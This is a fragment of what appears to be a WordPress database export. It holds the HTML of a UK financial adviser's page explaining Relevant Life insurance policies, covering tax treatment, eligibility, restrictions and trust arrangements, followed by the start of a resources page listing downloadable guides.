#ff00ff;\">all the UK’s</span> leading insurers – <span style=\"font-size: large;\">Here is a few you might recognise</span></span></p>&#13;\n<p><a href=\"../wp-content/uploads/2013/05/aviva.jpg\"><img class=\"size-full wp-image-4014 alignleft\" alt=\"aviva\" src=\"../wp-content/uploads/2013/05/aviva.jpg\" width=\"69\" height=\"40\"/></a><a href=\"#\"/> <a href=\"#\"/><a href=\"#\"/> <a href=\"#\"/> <a href=\"#\"/><a href=\"#\"/> <a href=\"#\"/></p>&#13;\n<p> </p>&#13;\n<p> </p>&#13;\n<p><span style=\"font-family: tahoma,geneva,sans-serif; font-size: x-large;\">Let the <span style=\"color: #ff00ff;\">TAXMAN</span> Pay For Your Life Cover – Here’s How </span></p>&#13;\n<p/>&#13;\n<p>We’ve used an example of £1,000 a year for the life cover on an employee who is paying income tax at 40% and employee’s National Insurance at 2% (on top end of income). We’ve also assumed for this example that the employer is paying corporation tax of 20% (the small profits rate) and will pay employer’s National Insurance of 13.8% (the contracted-in rate).</p>&#13;\n<p> </p>&#13;\n<div class=\"one_half\">&#13;\n<p><span style=\"color: #99cc00;\"><span style=\"font-family: tahoma,geneva,sans-serif; font-size: medium;\"><span style=\"color: #000000;\">Benefits <span style=\"color: #ff00ff;\">for you</span></span></span></span></p>&#13;\n<p><span style=\"font-size: small;\"><span style=\"font-family: tahoma,geneva,sans-serif;\">Available to companies of all sizes and on an individual basis, a Relevant Life </span><span style=\"font-family: tahoma,geneva,sans-serif;\">Policy can help you:</span></span></p>&#13;\n<ul class=\"bullet-plus\"><li>&#13;\n<div align=\"LEFT\"><span style=\"font-family: tahoma,geneva,sans-serif; font-size: small;\">Attract and retain the best staff</span></div>&#13;\n</li>&#13;\n<li>&#13;\n<div align=\"LEFT\"><span style=\"font-family: tahoma,geneva,sans-serif; font-size: small;\">Reward your best people with great benefits</span></div>&#13;\n</li>&#13;\n<li>&#13;\n<div align=\"LEFT\"><span style=\"font-size: small;\"><span style=\"font-family: tahoma,geneva,sans-serif;\">Make up to 60% tax savings on gross premiums when compared to a traditional </span><span style=\"font-family: tahoma,geneva,sans-serif;\">Life Cover Policy – a tax-efficient way for you to arrange Life Cover for an employee</span></span></div>&#13;\n</li>&#13;\n</ul><div class=\"simple-grey-box\" style=\"margin: 5px auto 20px; width: 70%;\">They are <b>not </b>suitable for the self-employed, equity partners or members of limited liability partnerships, although their employed staff could be covered.</div>&#13;\n<p/></div><div class=\"one_half last\">&#13;\n<p><span style=\"color: #99cc00; font-family: tahoma,geneva,sans-serif; font-size: medium;\"><span style=\"color: #000000;\">Benefits <span style=\"color: #ff00ff;\">for your employees</span></span></span></p>&#13;\n<p><span style=\"font-family: tahoma,geneva,sans-serif; font-size: small;\">A Relevant Life Policy also has many benefits for your employees:</span></p>&#13;\n<ul class=\"bullet-plus\"><li>&#13;\n<div align=\"LEFT\"><span style=\"font-family: tahoma,geneva,sans-serif; font-size: small;\">Like a ‘death in service’ benefit, it’ll pay an employee’s family a lump sum if they die during their employment.</span></div>&#13;\n</li>&#13;\n<li><span style=\"font-family: tahoma,geneva,sans-serif; font-size: small;\">It doesn’t count as a retirement benefit so it won’t affect their Lifetime Pension Allowance</span></li>&#13;\n<li>&#13;\n<div align=\"LEFT\"><span style=\"font-family: tahoma,geneva,sans-serif; font-size: small;\">If they leave the company, we’ll make it easy for them to take out their own policy with us – so they can ensure their cover continues.</span></div>&#13;\n</li>&#13;\n</ul><p> </p>&#13;\n<p/></div><div class=\"clearboth\"/></div></div><div class=\"fullwidth-box\" style=\"background-color:#fff;background-image:url();background-repeat:no-repeat;background-position:top left;background-attachment:scroll;border-top:0px solid ;border-bottom:0px solid ;padding-top:0px;padding-bottom:20px;-webkit-background-size: cover;-moz-background-size: cover;-o-background-size: cover;background-size: cover;\"><div class=\"avada-row\">&#13;\n<p> </p>&#13;\n<p><span style=\"color: #99cc00; font-size: large;\"><span style=\"color: #000000; font-family: tahoma,geneva,sans-serif; font-size: x-large;\"><span style=\"color: #ff00ff;\">Fast Facts</span> For Relevant Life Insurance</span></span></p>&#13;\n<div class=\"wpb_tabs wpb_content_element \" data-interval=\"0\">&#13;\n		<div class=\"wpb_wrapper wpb_tour_tabs_wrapper ui-tabs clearfix\">&#13;\n			<ul class=\"clearfix ui-tabs-nav\"><li><a href=\"#tab-1366030210-1-65\">What is Relevant Life Insurance</a></li><li><a href=\"#tab-1366030210-2-69\">Who Qaulifies for Relevant Life Coveri</a></li><li><a href=\"#tab-1366030254919-3-10\">How Does Relevant Life Work</a></li><li><a href=\"#tab-1369690291232-4-1\">Relevant Life Insurance Trusts</a></li></ul><div id=\"tab-1366030210-1-65\" class=\"wpb_tab wpb_row vc_row-fluid ui-tabs-panel wpb_ui-tabs-hide clearfix\">&#13;\n				 &#13;\n	<div class=\"wpb_text_column wpb_content_element \">&#13;\n		<div class=\"wpb_wrapper\">&#13;\n			&#13;\n<div>&#13;\n<p>Relevant life policies are non-registered single life death in service policies, which provide a lump sum benefit on the death of an employee outside of a registered group life scheme.Stand-alone single life relevant life policies are an alternative way for directors to obtain tax efficient death in service benefits for themselves and their employees. What are the advantages?</p>&#13;\n<ul class=\"bullet-star\"><li>&#13;\n<div align=\"LEFT\">The policies can be set up on a single life basis, even for a one-person limited company. The benefit will not form part of the employee’s lifetime pension allowance</div>&#13;\n</li>&#13;\n<li>&#13;\n<div align=\"LEFT\">The payments will not form part of the employee’s annual pension allowance</div>&#13;\n</li>&#13;\n<li>&#13;\n<div align=\"LEFT\">The payments employers make are not subject to Income Tax or National Insurance because they are not normally assessable on the employee as a benefit in kind</div>&#13;\n</li>&#13;\n<li>&#13;\n<div align=\"LEFT\">These payments can be treated as an allowable expense for the employer in calculating their tax liability, as long as the local inspector of taxes is satisfied they qualify under the ‘wholly and exclusively’ rules.</div>&#13;\n</li>&#13;\n</ul><p>In most cases the benefits are paid free of Inheritance Tax – provided the benefits are payable through a discretionary trust.</p>&#13;\n</div>&#13;\n&#13;\n		</div> &#13;\n	</div>  &#13;\n			</div>  &#13;\n			<div id=\"tab-1366030210-2-69\" class=\"wpb_tab wpb_row vc_row-fluid ui-tabs-panel wpb_ui-tabs-hide clearfix\">&#13;\n				 &#13;\n	<div class=\"wpb_text_column wpb_content_element \">&#13;\n		<div class=\"wpb_wrapper\">&#13;\n			&#13;\n<div>&#13;\n<div><span style=\"font-family: tahoma,geneva,sans-serif; font-size: medium;\">Who are relevant life policies suitable for?</span></div>&#13;\n<ul><li><span style=\"font-family: tahoma,geneva,sans-serif; font-size: small;\">Small businesses that do not have enough eligible employees to warrant </span><span style=\"font-family: tahoma,geneva,sans-serif; font-size: small;\">a group life scheme. This could include a one-person company</span></li>&#13;\n<li><span style=\"font-family: tahoma,geneva,sans-serif; font-size: small;\">High-earning employees or directors who have substantial pension funds </span><span style=\"font-family: tahoma,geneva,sans-serif; font-size: small;\">and do not want their benefits to form part of their lifetime allowance</span></li>&#13;\n<li><span style=\"font-family: tahoma,geneva,sans-serif; font-size: small;\">Members of group life schemes who want to top up their benefits </span><span style=\"font-family: tahoma,geneva,sans-serif; font-size: small;\">beyond the scheme rules</span><span style=\"font-family: tahoma,geneva,sans-serif; font-size: small;\">They are </span><span style=\"font-family: tahoma,geneva,sans-serif; font-size: small;\"> </span><span style=\"font-family: tahoma,geneva,sans-serif; font-size: small;\"><b><span style=\"color: #00377c;\"><span style=\"color: #00377c;\"><span style=\"color: #00377c;\">not </span></span></span></b><span style=\"color: #00377c;\"><span style=\"color: #00377c;\"><span style=\"color: #00377c;\">suitable for the self-employed, equity partners or </span></span></span></span><span style=\"font-family: tahoma,geneva,sans-serif; font-size: small;\">members of limited liability partnerships, although their employed staff </span><span style=\"font-family: tahoma,geneva,sans-serif; font-size: small;\">could be covered.</span><span style=\"font-family: tahoma,geneva,sans-serif; font-size: small;\">Are there any restrictions?</span><span style=\"font-family: tahoma,geneva,sans-serif; font-size: small;\">The policies </span><span style=\"font-family: tahoma,geneva,sans-serif; font-size: small;\"><b><span style=\"color: #00377c;\"><span style=\"color: #00377c;\"><span style=\"color: #00377c;\">must</span></span></span></b><span style=\"color: #00377c;\"><span style=\"color: #00377c;\"><span style=\"color: #00377c;\">:</span></span></span></span></li>&#13;\n<li><span style=\"font-family: tahoma,geneva,sans-serif; font-size: small;\">Only provide for a lump sum death benefit payable before the age of 75</span></li>&#13;\n<li><span style=\"font-family: tahoma,geneva,sans-serif; font-size: small;\">Only be payable to an individual or charity.</span><span style=\"font-family: tahoma,geneva,sans-serif; font-size: small;\">The policies </span><span style=\"font-family: tahoma,geneva,sans-serif; font-size: small;\"><b><span style=\"color: #00377c;\"><span style=\"color: #00377c;\"><span style=\"color: #00377c;\">must not</span></span></span></b><span style=\"color: #00377c;\"><span style=\"color: #00377c;\"><span style=\"color: #00377c;\">:</span></span></span></span></li>&#13;\n<li><span style=\"font-family: tahoma,geneva,sans-serif; font-size: small;\">Provide any other benefit</span></li>&#13;\n<li><span style=\"font-family: tahoma,geneva,sans-serif; font-size: small;\">Be capable of having a surrender value</span></li>&#13;\n<li><span style=\"font-family: tahoma,geneva,sans-serif; font-size: small;\">Be used mainly for the purpose of tax avoidance</span></li>&#13;\n</ul></div>&#13;\n&#13;\n		</div> &#13;\n	</div>  &#13;\n			</div>  &#13;\n			<div id=\"tab-1366030254919-3-10\" class=\"wpb_tab wpb_row vc_row-fluid ui-tabs-panel wpb_ui-tabs-hide clearfix\">&#13;\n				 &#13;\n	<div class=\"wpb_text_column wpb_content_element \">&#13;\n		<div class=\"wpb_wrapper\">&#13;\n			&#13;\n<div>&#13;\n<div>&#13;\n<div>&#13;\n<div><span style=\"font-family: tahoma,geneva,sans-serif; font-size: small;\">Tax treatment of premiums for an employee-owned and </span><span style=\"font-family: tahoma,geneva,sans-serif; font-size: small;\">employer-paid life policy </span></div>&#13;\n<div><span style=\"font-family: tahoma,geneva,sans-serif; font-size: small;\">If the employee owns the plan and the employer pays the premium, </span><span style=\"font-family: tahoma,geneva,sans-serif; font-size: small;\">the payment by the employer will be treated as the employer meeting </span><span style=\"font-family: tahoma,geneva,sans-serif; font-size: small;\">a pecuniary liability of the employee. This is where the employee has </span><span style=\"font-family: tahoma,geneva,sans-serif; font-size: small;\">entered into a contract, which involves the payment of premiums, but </span><span style=\"font-family: tahoma,geneva,sans-serif; font-size: small;\">the employer meets the cost on behalf of the employee. </span><span style=\"font-family: tahoma,geneva,sans-serif; font-size: small;\">Therefore, the </span><span style=\"font-family: tahoma,geneva,sans-serif; font-size: small;\">employee is liable to both Income Tax and employee’s National Insurance </span><span style=\"font-family: tahoma,geneva,sans-serif; font-size: small;\">contributions on the premium. To provide the total cost of the plan, the </span><span style=\"font-family: tahoma,geneva,sans-serif; font-size: small;\">amount of tax and National Insurance payable on the premium must be </span><span style=\"font-family: tahoma,geneva,sans-serif; font-size: small;\">taken into account.</span><span style=\"font-family: tahoma,geneva,sans-serif; font-size: small;\">The employer will usually be able to treat the gross cost as a trading </span><span style=\"font-family: tahoma,geneva,sans-serif; font-size: small;\">expense, whether paid as salary or if the employer has paid the premium.</span></div>&#13;\n<div/>&#13;\n<div><span style=\"font-family: tahoma,geneva,sans-serif; font-size: small;\">Tax treatment of premiums for a relevant life policy</span></div>&#13;\n<div><span style=\"font-family: tahoma,geneva,sans-serif; font-size: small;\">The employer will set up the plan and pay the premiums. No Income </span><span style=\"font-family: tahoma,geneva,sans-serif; font-size: small;\">Tax or National Insurance liabilities arise – if the plan meets legislative </span><span style=\"font-family: tahoma,geneva,sans-serif; font-size: small;\">requirements to qualify as a relevant life policy.</span><span style=\"font-family: tahoma,geneva,sans-serif; font-size: small;\">Provided that the local inspector of taxes accepts that payment of the </span><span style=\"font-family: tahoma,geneva,sans-serif; font-size: small;\">premiums has been incurred ‘wholly and exclusively for the purpose of </span><span style=\"font-family: tahoma,geneva,sans-serif; font-size: small;\">trade’, the employer may be able to claim Corporation Tax relief on </span><span style=\"font-family: tahoma,geneva,sans-serif; font-size: small;\">the premium.</span></div>&#13;\n</div>&#13;\n</div>&#13;\n</div>&#13;\n&#13;\n		</div> &#13;\n	</div>  &#13;\n			</div>  &#13;\n			<div id=\"tab-1369690291232-4-1\" class=\"wpb_tab wpb_row vc_row-fluid ui-tabs-panel wpb_ui-tabs-hide clearfix\">&#13;\n				 &#13;\n	<div class=\"wpb_text_column wpb_content_element \">&#13;\n		<div class=\"wpb_wrapper\">&#13;\n			&#13;\n<p>Relevant life policy trusts</p>&#13;\n<p>A relevant life policy needs to be set up in trust . As the planshould not start until the trust form has been completed and accepted by the insurer</p>&#13;\n<p>If the plan is placed in trust at a later date, once the plan has started, there may be a Capital Gains Tax liability in the event of a claim being paid.</p>&#13;\n<p>The trust also demonstrates that the plan proceeds will be payable to individuals (the employee’s dependants) which is one of the legislative requirements to qualify as a relevant life policy.</p>&#13;\n<p>The employer (as the settlor of the trust, known as the Principal  Employer) will be a trustee. An additional trustee must be added to act with the employer. If the employee is to be the additional trustee,a further additional trustee should also be added to ensure that there would be two trustees available to act in the event of the employee’s death.</p>&#13;\n<p>In addition to our administrative requirement that an additional  trustee must be added when the trust is created, the trust requires there to be at least two trustees at all times, unless a corporate body is a trustee. An additional trustee may be a family member of the employee, such as a spouse, or perhaps an independent trustee, such as a solicitor.</p>&#13;\n<p>The employee has power under the trust to change the trustees. Benefits are paid at the discretion of the trustees, who will decide  which discretionary beneficiaries receive funds, when to pay and what amounts. It is possible for the employee to guide the trustees in their decision making and a nomination form is included in the trust to enable the employee to express their wishes. The nomination form does not bind the trustees, though it will usually be followed by them in making their decision.</p>&#13;\n<p>Beneficiaries</p>&#13;\n<p><span style=\"color: #00377c; font-family: Frutiger-Light; font-size: small;\"><span style=\"color: #00377c; font-family: Frutiger-Light; font-size: small;\"><span style=\"color: #00377c; font-family: Frutiger-Light; font-size: small;\">: The trust includes a wide class of potential beneficiaries, </span></span></span>known as discretionary beneficiaries. This includes the employee’s spouse, children and grandchildren.</p>&#13;\n<p>The employee is also included as a discretionary beneficiary, to allow the trustees to assign the plan to the employee if he leaves the business. It is not recommended that the employer or a co-shareholder be added as a discretionary beneficiary (unless they are also a spouse or civil partner) as this may compromise the tax benefits of the plan.</p>&#13;\n&#13;\n		</div> &#13;\n	</div>  &#13;\n			</div>  &#13;\n		</div> &#13;\n	</div>  <div class=\"wpb_row vc_row-fluid \"> &#13;\n	<div class=\"vc_span12 wpb_column column_container\">&#13;\n		<div class=\"wpb_wrapper\">&#13;\n			 <div class=\"wpb_call_to_action wpb_content_element clearfix cta_align_bottom\"><h2 class=\"wpb_call_text\">If you’re considering something as important as life insurance for you and your family</h2><a class=\"wpb_button_a\" href=\"../contact-us/\"><span class=\"wpb_button  wpb_btn-success wpb_btn-large\">Start your enquiry here</span></a></div> &#13;\n &#13;\n		</div> &#13;\n	</div> &#13;\n </div> <div class=\"wpb_row vc_row-fluid \"/> &#13;\n	<div class=\"vc_span12 wpb_column column_container\">&#13;\n		<div class=\"wpb_wrapper\">&#13;\n			&#13;\n		</div> &#13;\n	</div> &#13;\n &#13;\n	<div class=\"wpb_text_column wpb_content_element \">&#13;\n		<div class=\"wpb_wrapper\">&#13;\n			&#13;\n		</div> &#13;\n	</div> </div></div>&#13;\n<p> </p>&#13;\n			</div>&#13;\n					</div>&#13;\n			</div>&#13;\n		</div>&#13;\n	</div>&#13;\n				<footer class=\"footer-area\"><div class=\"avada-row\">&#13;\n			<section class=\"columns columns-3\"><article class=\"col\"><div id=\"recent-posts-3\" class=\"footer-widget-col widget_recent_entries\">		<p>Latest Wealth Management News</p>		<ul><li>&#13;\n				<a href=\"../seven-deadly-investment-sins/\">The Seven Deadly Investment Sins</a>&#13;\n							<span class=\"post-date\">February 10, 2017</span>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"../mortgage-strategic-alliance/\">Mortgage Strategic Alliance</a>&#13;\n							<span class=\"post-date\">February 5, 2017</span>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"../esmart-money-januaryfebruary-2014-issue/\">eSmart Money January/February 2017 issue</a>&#13;\n							<span class=\"post-date\">January 7, 2017</span>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"../how-much-money-can-i-get-pension/\">How much Money can I get out of my Pension?</a>&#13;\n							<span class=\"post-date\">October 31, 2017</span>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"../what-does-a-wealth-managerdo/\">What Does a Wealth Manager Do?</a>&#13;\n							<span class=\"post-date\">September 5, 2017</span>&#13;\n						</li>&#13;\n				</ul><div style=\"clear:both;\"/></div>				</article><article class=\"col\"><div id=\"text-13\" class=\"footer-widget-col widget_text\"><p>Equity SMART</p>			<div class=\"textwidget\"><p>This year, 2017, sees us reach our 20 year anniversary. In all that time we’ve seen real changes in the financial market, but our core values have forever remained the same. Put simply, we’ve always striven to offer unbiased and objective financial advice, with a view to protecting and enhancing our client’s wealth and sense of well-being. Welcome to our company.</p>&#13;\n</div>&#13;\n		<div style=\"clear:both;\"/></div><div id=\"recent_works-widget-3\" class=\"footer-widget-col recent_works\"><p>Useful Guides</p>		<div class=\"recent-works-items clearfix\">&#13;\n								<a href=\"../portfolio-items/smart-money-nov-dec/\" title=\"Smart Money: Nov-Dec\">&#13;\n					</a>&#13;\n						<a href=\"../portfolio-items/critical-illness-guide/\" title=\"Critical Illness Guide\">&#13;\n					</a>&#13;\n						<a href=\"../portfolio-items/guide-auto-enrolment/\" title=\"A Guide To Auto Enrolment\">&#13;\n					</a>&#13;\n						<a href=\"/\" title=\"Investing For Income\">&#13;\n					</a>&#13;\n				</div>&#13;\n&#13;\n		<div style=\"clear:both;\"/></div>				</article><article class=\"col\"/><article class=\"col last\"/></section></div>&#13;\n	</footer><footer id=\"footer\"><div class=\"avada-row\">&#13;\n					<ul class=\"copyright\"><li><br/><br/></li>&#13;\n			</ul></div>&#13;\n	</footer></div><!-- wrapper -->&#13;\n	&#13;\n	&#13;\n	<script type=\"text/javascript\" src=\"../maps/api/js_v_3.exp_amp_sensor_false_amp_language_en.js\"/><!-- W3TC-include-js-head --><link rel=\"stylesheet\" id=\"ui-custom-theme-css\" href=\"../wp-content/plugins/js_composer/assets/ui-custom-theme/jquery-ui-less.custom.css\" type=\"text/css\" media=\"screen\"/><link rel=\"stylesheet\" id=\"js_composer_front-css\" href=\"../wp-content/plugins/js_composer/assets/css/js_composer_front.css\" type=\"text/css\" media=\"screen\"/><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar _wpcf7 = {\"loaderUrl\":\"http://www.equalitywalk.org.uk/wp-content/plugins/contact-form-7/images/ajax-loader.gif\",\"sending\":\"Sending ...\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"../wp-content/plugins/contact-form-7/includes/js/scripts.js\"/><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar iphormL10n = {\"error_submitting_form\":\"An error occurred submitting the form\",\"swfupload_flash_url\":\"http://www.equalitywalk.org.uk/wp-includes/js/swfupload/swfupload.swf\",\"swfupload_upload_url\":\"http://www.equalitywalk.org.uk/?iphorm_swfupload=1\",\"swfupload_too_many\":\"You have attempted to queue too many files\",\"swfupload_file_too_big\":\"This file exceeds the maximum upload size\",\"swfupload_file_empty\":\"This file is empty\",\"swfupload_file_type_not_allowed\":\"This file type is not allowed\",\"swfupload_unknown_queue_error\":\"Unknown queue error, please try again later\",\"swfupload_upload_error\":\"Upload error\",\"swfupload_upload_failed\":\"Upload failed\",\"swfupload_server_io\":\"Server IO error\",\"swfupload_security_error\":\"Security error\",\"swfupload_limit_exceeded\":\"Upload limit exceeded\",\"swfupload_validation_failed\":\"Validation failed\",\"swfupload_upload_stopped\":\"Upload stopped\",\"swfupload_unknown_upload_error\":\"Unknown upload error\",\"plugin_url\":\"http://www.equalitywalk.org.uk/wp-content/plugins/iphorm-form-builder\",\"preview_no_submit\":\"The form cannot be submitted in the preview\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.iphorm.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.smooth-scroll.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/qtip2/jquery.qtip.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/fancybox/jquery.fancybox-1.3.4.pack.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/uniform/jquery.uniform.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.infieldlabel.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/themes/light/rounded.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/framework/plugins/tf-flexslider/assets/js/jquery.mousewheel.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/framework/plugins/tf-flexslider/assets/js/jquery.flexslider.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/modernizr-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.carouFredSel-6.2.1-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.prettyPhoto-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.flexslider-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.fitvids-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/gmap-min.js\"/><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar js_local_vars = {\"dropdown_goto\":\"Go to...\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/main-min.js\"/><script type=\"text/javascript\" src=\"../wp-includes/js/jquery/ui/jquery.ui.core.min.js\"/><script type=\"text/javascript\" src=\"../wp-includes/js/jquery/ui/jquery.ui.widget.min.js\"/><script type=\"text/javascript\" src=\"../wp-includes/js/jquery/ui/jquery.ui.tabs.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/js_composer/assets/jquery-ui-tabs-rotate/jquery-ui-tabs-rotate.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/js_composer/assets/js_composer_front.js\"/></body>','Relevant Life Plan','','publish','closed','closed','','relevant-life-plan','','','2017-09-21 16:34:38','2017-09-21 16:34:38','',0,'http://www.equalitywalk.org.uk/relevant-life-plan',0,'page','',0),(99,1,'2017-09-21 16:34:38','2017-09-21 16:34:38','<body class=\"page page-id-6487 page-template page-template-portfolio-two-column-text-php light  wpb-js-composer js-comp-ver-3.5.4 vc_responsive\">&#13;\n&#13;\n&#13;\n&#13;\n&#13;\n	<div id=\"wrapper\">&#13;\n					<div class=\"header-wrapper\">&#13;\n			<div class=\"header-v2\">&#13;\n		<div class=\"header-social\">&#13;\n		<div class=\"avada-row\">&#13;\n			&#13;\n			<div class=\"alignright\">&#13;\n				<div class=\"top-menu\">&#13;\n	<ul id=\"snav\" class=\"menu\"><li id=\"menu-item-4739\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-4739\"><a href=\"/\">Home</a></li>&#13;\n<li id=\"menu-item-4811\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-4811\"><a href=\"../about-us/\">About</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-5319\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-5319\"><a href=\"../our-team/\">Our Team</a></li>&#13;\n	<li id=\"menu-item-6369\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6369\"><a href=\"../about-us/testimonials/\">Testimonials</a></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-6489\" class=\"menu-item menu-item-type-post_type menu-item-object-page current-menu-item page_item page-item-6487 current_page_item menu-item-6489\"><a href=\"../resources/\">Resources</a></li>&#13;\n<li id=\"menu-item-5417\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-5417\"><a href=\"../our-blog/\">Blog</a></li>&#13;\n<li id=\"menu-item-6142\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-6142\"><a href=\"https://rsr.wrapadviser.co.uk/home.aspx?logout=1\" onclick=\"javascript:_gaq.push([\'_trackEvent\',\'outbound-menu\',\'http://rsr.wrapadviser.co.uk\']);\">Login</a></li>&#13;\n<li id=\"menu-item-4746\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-4746\"><a href=\"../contact-us/\">Contact</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-6358\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6358\"><a href=\"../terms-of-use/\">Terms Of Use</a></li>&#13;\n	<li id=\"menu-item-6359\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6359\"><a href=\"../privacy-policy/\">Privacy Policy</a></li>&#13;\n	<li id=\"menu-item-6357\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6357\"><a href=\"../cookies/\">Cookies</a></li>&#13;\n</ul></li>&#13;\n			</ul></div>			</div>&#13;\n		</div>&#13;\n	</div>&#13;\n		<header id=\"header\"/></div>		</div>&#13;\n				<div id=\"sliders-container\">&#13;\n									</div>&#13;\n					<div class=\"page-title-container\">&#13;\n		<div class=\"page-title\">&#13;\n			<div class=\"page-title-wrapper\">&#13;\n				<div class=\"page-title-captions\">&#13;\n										<h1 class=\"entry-title\">&#13;\n										Resources										</h1>&#13;\n														</div>&#13;\n															<ul class=\"breadcrumbs\"><li> <a href=\"/\">Home</a></li><li>Resources</li></ul></div>&#13;\n		</div>&#13;\n	</div>&#13;\n													<div id=\"main\" class=\"\" style=\"overflow:hidden !important;\">&#13;\n		<div class=\"avada-row\" style=\"\">&#13;\n					<div id=\"content\" class=\"portfolio portfolio-two portfolio-two-text \" style=\"width:100%\">&#13;\n				<div id=\"post-6487\" class=\"post-6487 page type-page status-publish hentry\">&#13;\n			<div class=\"post-content\">&#13;\n											</div>&#13;\n		</div>&#13;\n								<ul class=\"portfolio-tabs clearfix\"><li class=\"active\"><a data-filter=\"*\" href=\"#\">All</a></li>&#13;\n						<li><a data-filter=\".annuities\" href=\"#\">Annuities</a></li>&#13;\n						<li><a data-filter=\".auto-enrolment-2\" href=\"#\">Auto Enrolment</a></li>&#13;\n						<li><a data-filter=\".guides\" href=\"#\">Guides</a></li>&#13;\n						<li><a data-filter=\".insurance\" href=\"#\">Insurance</a></li>&#13;\n						<li><a data-filter=\".investment\" href=\"#\">Investment</a></li>&#13;\n						<li><a data-filter=\".smart-money\" href=\"#\">Smart Money</a></li>&#13;\n					</ul><div class=\"portfolio-wrapper\">&#13;\n									<div class=\"portfolio-item guides smart-money \">&#13;\n								<div class=\"image\">&#13;\n																									<div class=\"image-extras\">&#13;\n						<div class=\"image-extras-content\">&#13;\n							<a style=\"display:inline-block;\" class=\"icon link-icon\" href=\"../portfolio-items/smart-money-nov-dec/\">Permalink</a>&#13;\n																					<a href=\"#\"><img style=\"display:none;\" alt=\"\"/>Gallery</a>&#13;\n							<p>Smart Money: Nov-Dec</p>&#13;\n							<h4><a href=\"../portfolio_category/guides/\" rel=\"tag\">Guides</a>, <a href=\"/\" rel=\"tag\">Smart Money</a></h4>&#13;\n						</div>&#13;\n					</div>&#13;\n				</div>&#13;\n								<div class=\"portfolio-content\">&#13;\n					<h2 class=\"entry-title\"><a href=\"../portfolio-items/smart-money-nov-dec/\">Smart Money: Nov-Dec</a></h2>&#13;\n					<h4><a href=\"../portfolio_category/guides/\" rel=\"tag\">Guides</a>, <a href=\"/\" rel=\"tag\">Smart Money</a></h4>&#13;\n&#13;\n					<div class=\"post-content\">&#13;\n										<div class=\"excerpt-container\"><p>Click Here To Download Your Guide For FREE.</p>&#13;\n</div>					</div>&#13;\n				</div>&#13;\n			</div>&#13;\n									<div class=\"portfolio-item guides insurance \">&#13;\n								<div class=\"image\">&#13;\n																									<div class=\"image-extras\">&#13;\n						<div class=\"image-extras-content\">&#13;\n							<a style=\"display:inline-block;\" class=\"icon link-icon\" href=\"../portfolio-items/critical-illness-guide/\">Permalink</a>&#13;\n																					<a href=\"#\"><img style=\"display:none;\" alt=\"\"/>Gallery</a>&#13;\n							<p>Critical Illness Guide</p>&#13;\n							<h4><a href=\"../portfolio_category/guides/\" rel=\"tag\">Guides</a>, <a href=\"/\" rel=\"tag\">Insurance</a></h4>&#13;\n						</div>&#13;\n					</div>&#13;\n				</div>&#13;\n								<div class=\"portfolio-content\">&#13;\n					<h2 class=\"entry-title\"><a href=\"../portfolio-items/critical-illness-guide/\">Critical Illness Guide</a></h2>&#13;\n					<h4><a href=\"../portfolio_category/guides/\" rel=\"tag\">Guides</a>, <a href=\"/\" rel=\"tag\">Insurance</a></h4>&#13;\n&#13;\n					<div class=\"post-content\">&#13;\n										<div class=\"excerpt-container\"><p>Click Here To Download Your Guide For FREE.</p>&#13;\n</div>					</div>&#13;\n				</div>&#13;\n			</div>&#13;\n									<div class=\"portfolio-item auto-enrolment-2 guides \">&#13;\n								<div class=\"image\">&#13;\n																									<div class=\"image-extras\">&#13;\n						<div class=\"image-extras-content\">&#13;\n							<a style=\"display:inline-block;\" class=\"icon link-icon\" href=\"../portfolio-items/guide-auto-enrolment/\">Permalink</a>&#13;\n																					<a href=\"#\"><img style=\"display:none;\" alt=\"\"/>Gallery</a>&#13;\n							<p>A Guide To Auto Enrolment</p>&#13;\n							<h4><a href=\"/\" rel=\"tag\">Auto Enrolment</a>, <a href=\"../portfolio_category/guides/\" 